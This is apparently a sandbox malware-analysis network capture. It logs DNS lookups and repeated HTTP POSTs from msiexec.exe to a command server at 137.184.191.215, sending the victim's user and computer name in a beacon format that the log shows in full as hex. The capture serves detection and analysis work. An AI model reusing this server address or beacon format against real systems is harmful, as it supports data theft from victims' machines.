                                      Oct 1, 2024 07:44:57.002315998 CEST4974680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:57.002372026 CEST4974680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:57.002588987 CEST4974680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:57.007375002 CEST8049746137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:57.150290966 CEST4974780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:57.156016111 CEST8049747137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:57.156107903 CEST4974780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:57.158227921 CEST4974780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:57.163171053 CEST8049747137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:57.163238049 CEST4974780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:57.168029070 CEST8049747137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:59.701931953 CEST8049747137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:59.701963902 CEST8049747137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:59.701973915 CEST8049747137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:59.702009916 CEST8049747137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:59.702024937 CEST8049747137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:59.702074051 CEST4974780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:59.702127934 CEST4974780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:59.702332973 CEST4974780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:59.835190058 CEST4974880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:59.840162039 CEST8049748137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:59.840265989 CEST4974880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:59.842614889 CEST4974880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:59.847397089 CEST8049748137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:59.847503901 CEST4974880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:59.852279902 CEST8049748137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:45:02.415518045 CEST8049748137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:45:02.415539026 CEST8049748137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:45:02.415553093 CEST8049748137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:45:02.415565968 CEST8049748137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:45:02.415632963 CEST4974880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:45:02.415828943 CEST4974880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:45:02.420615911 CEST8049748137.184.191.215192.168.2.5
                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 1, 2024 07:42:59.262137890 CEST5227753192.168.2.51.1.1.1
                                      Oct 1, 2024 07:42:59.269028902 CEST53522771.1.1.1192.168.2.5
                                      Oct 1, 2024 07:43:00.311955929 CEST5330353192.168.2.51.1.1.1
                                      Oct 1, 2024 07:43:00.318708897 CEST53533031.1.1.1192.168.2.5
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 1, 2024 07:42:59.262137890 CEST192.168.2.51.1.1.10x1dddStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                      Oct 1, 2024 07:43:00.311955929 CEST192.168.2.51.1.1.10xd57bStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 1, 2024 07:42:59.269028902 CEST1.1.1.1192.168.2.50x1dddNo error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                                      Oct 1, 2024 07:43:00.318708897 CEST1.1.1.1192.168.2.50xd57bNo error (0)drive.usercontent.google.com142.250.184.193A (IP address)IN (0x0001)false
                                      • drive.google.com
                                      • drive.usercontent.google.com
                                      • 137.184.191.215
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549716137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:43:34.545209885 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 180
                                      Connection: close
                                      Oct 1, 2024 07:43:34.551354885 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: 'ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2CgESg9
                                      Oct 1, 2024 07:43:37.245479107 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:35 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:37.245507002 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:43:37.245517969 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:43:37.245532990 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.549717137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:43:37.317486048 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 180
                                      Connection: close
                                      Oct 1, 2024 07:43:37.322516918 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: 'ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2Cty9cK
                                      Oct 1, 2024 07:43:40.069097996 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:37 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:40.069118023 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:43:40.069129944 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.549718137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:43:40.180964947 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:40.185853004 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:43:42.828028917 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:40 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:42.828052044 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:43:42.828062057 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:43:42.828068972 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.549719137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:43:42.997507095 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:43.003129959 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:43:45.589272976 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:43 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:45.589292049 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:43:45.589302063 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.549720137.184.191.215802584C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 1, 2024 07:43:45.736512899 CEST258OUTPOST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:45.741447926 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:43:48.330589056 CEST1236INHTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:46 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
